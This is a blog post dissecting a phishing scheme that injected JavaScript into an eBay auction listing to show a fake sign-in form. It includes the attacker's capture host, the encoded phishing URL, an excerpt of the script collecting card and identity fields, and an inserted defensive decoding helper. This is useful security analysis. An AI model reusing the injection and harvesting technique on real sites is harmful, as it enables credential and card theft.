eBay Javascript Injection

Most of the phishing emails I get for eBay are pretty obvious. Besides the typos and poor English, they usually link directly to arcane websites. Today I got one that took me to a listing on eBay which contained a login intercept. The script presents a reasonable looking signin form, obfuscates your login and the destination URL using rot-24 and sends it on to http://proxy.cheersfilms.com.tw/426006317/66728472 before submitting it to eBay.

I only find it noteworthy because I couldn’t find any public information about XSS flaws or other bugs allowing JavaScript injection into eBay auction listings, and a slightly more sophisticated attack would be pretty hard to detect.

There were several flags that made me cautious. First, the email (which was forged) started with:

eBay sent this message to billh2.
Your registered name is included to show this message originated from eBay.

My eBay user id is not billh2.

The second thing to tingle my spidey sense was the actual message, “hello, i want this item, i’ll pay extra just to be sure we will got a good deal, can you ship to zip code 19146? if all is ok respond me ASAP.” Sheesh! Who offers to pay extra without expecting special handling or something unusual?

The final clues were obvious after I clicked through the link to view my auction. The URL was so long I couldn’t see the auction number in the link, but it was obviously not the same number presented in my email. On the page, the JavaScript hides the actual auction item description and substitutes a fake login form. I knew it was fake because it wasn’t a secure page, it didn’t already have my user id, and the page wasn’t exactly like it looks when you’re actually logged in to eBay. Despite all that, it was pretty convincing, particularly since I was actually on an eBay webpage.

The JavaScript was able to hide everything on the page, and it could conceivably have been made to look much more realistic. Furthermore, since it was actually running from eBay, I imagine it could conceivably have been able to get my user id from the cookie eBay stashes in my browser. Other than the missing letter S after http, it could have been flawless. Frankly, that’s pretty scary.

If you want to see the script, it’s still up at

http://cgi.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=ViewItem&Item=5875281930

I neutered the URL, so you’ll need to view source to see the JavaScript.

To see the fake signin page, you can link to http://tinyurl.com/r8ecv

which takes you to

http://cgi.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=ViewItem
&=2&pUserId=&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=&pp=
&pa2=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=
&migrateVisitor=&Item=5875281930&aiu=rtqz{0ejggtuhknou0eqo0vy164822853718894:694
&jsc=sig&jsv=1&jsem=vqrruqhvB{cjqq0eqo

(remove white space to link)

aiu is the URL which captures your login (obfuscated with rot-24, i.e. every character code shifted by two).
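Decoding that parameter is the quickest way to find out where the harvested logins are going, which is what you need for blocking the host and filing an abuse report. The helper below is an added example, not code from the post or from the injected script: it pulls the parameters the script reads back out of the listing URL and reverses the shift-by-two obfuscation. The URL is the one quoted above with the line-break whitespace removed; the parameter names (aiu, jsc, jsv, jsem) are taken from it, and the function names are my own.

```javascript
// Added example: deobfuscate the "rot-24" parameters in the phishing URL.
// Over the printable ASCII range the scheme is just "add 2 to every character
// code" to encode, so decoding subtracts 2. Not from the original post.

// The listing URL from the post, reassembled with the line-break whitespace removed.
const PHISH_URL =
  "http://cgi.ebay.com/ws/eBayISAPI.dll?MfcISAPICommand=ViewItem" +
  "&=2&pUserId=&siteid=0&pageType=&pa1=&i1=&bshowgif=&UsingSSL=&ru=&pp=" +
  "&pa2=&errmsg=&runame=&ruparams=&ruproduct=&sid=&favoritenav=" +
  "&migrateVisitor=&Item=5875281930&aiu=rtqz{0ejggtuhknou0eqo0vy164822853718894:694" +
  "&jsc=sig&jsv=1&jsem=vqrruqhvB{cjqq0eqo";

// Parameters the injected script reads back from the URL (names as they appear in it).
const SUSPECT_PARAMS = ["aiu", "jsc", "jsv", "jsem"];

// Shift every character code by `shift`; decoding the captured values uses -2.
function rotChars(s, shift) {
  return Array.from(s, (ch) => String.fromCharCode(ch.charCodeAt(0) + shift)).join("");
}

// Summarise a listing URL: the real item number, the injected parameters,
// and the decoded capture URL/host so an analyst can block and report it.
function analyzeListingUrl(url) {
  const query = url.slice(url.indexOf("?") + 1);
  const params = new URLSearchParams(query);
  const report = { item: params.get("Item"), injected: {} };
  for (const name of SUSPECT_PARAMS) {
    if (params.has(name)) report.injected[name] = params.get(name);
  }
  if (report.injected.aiu) {
    report.captureUrl = rotChars(report.injected.aiu, -2);
    report.captureHost = report.captureUrl.split("/")[0];
  }
  return report;
}

console.log(JSON.stringify(analyzeListingUrl(PHISH_URL), null, 2));
```

Only aiu is decoded here; the other values are listed raw so the analyst can see what the script keys off without publishing anything that was deliberately obfuscated beyond the capture host itself.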

Here’s the part that truly sucks. If you enter a username and password that passes the script validation, it then prompts you to enter enough information to steal your credit card and most likely your identity. To wit,

	var user=Decript(GetURLVar('jsu'));
	var pass=Decript(GetURLVar('jsp'));
	var firstname=form.firstname.value;
	var lastname=form.lastname.value;
	var address1=form.address1.value;
	var address2=form.address2.value;
	var city=form.city.value;
	var State=form.State.value;
	var zip=form.zip.value;
	var countryId=form.countryId.value;
	var dayphone1=form.dayphone1.value;
	var dayphone2=form.dayphone2.value;
	var dayphone3=form.dayphone3.value;
	var dayphone4=form.dayphone4.value;
	var nightphone1=form.nightphone1.value;
	var nightphone2=form.nightphone2.value;
	var nightphone3=form.nightphone3.value;
	var nightphone4=form.nightphone4.value;
	var cardnumber=form.cardnumber.value;
	var ExpiryMonth=form.ExpiryMonth.value;
	var ExpiryYear=form.ExpiryYear.value;
	var verificationnumber=form.verificationnumber.value;

The JavaScript looks like it was built using library functions by some script kiddie. Considering how nicely the edits on the form submission are coded, I would have expected the spoof to be a bit more sophisticated.

Sucks to be coloradopackrat today.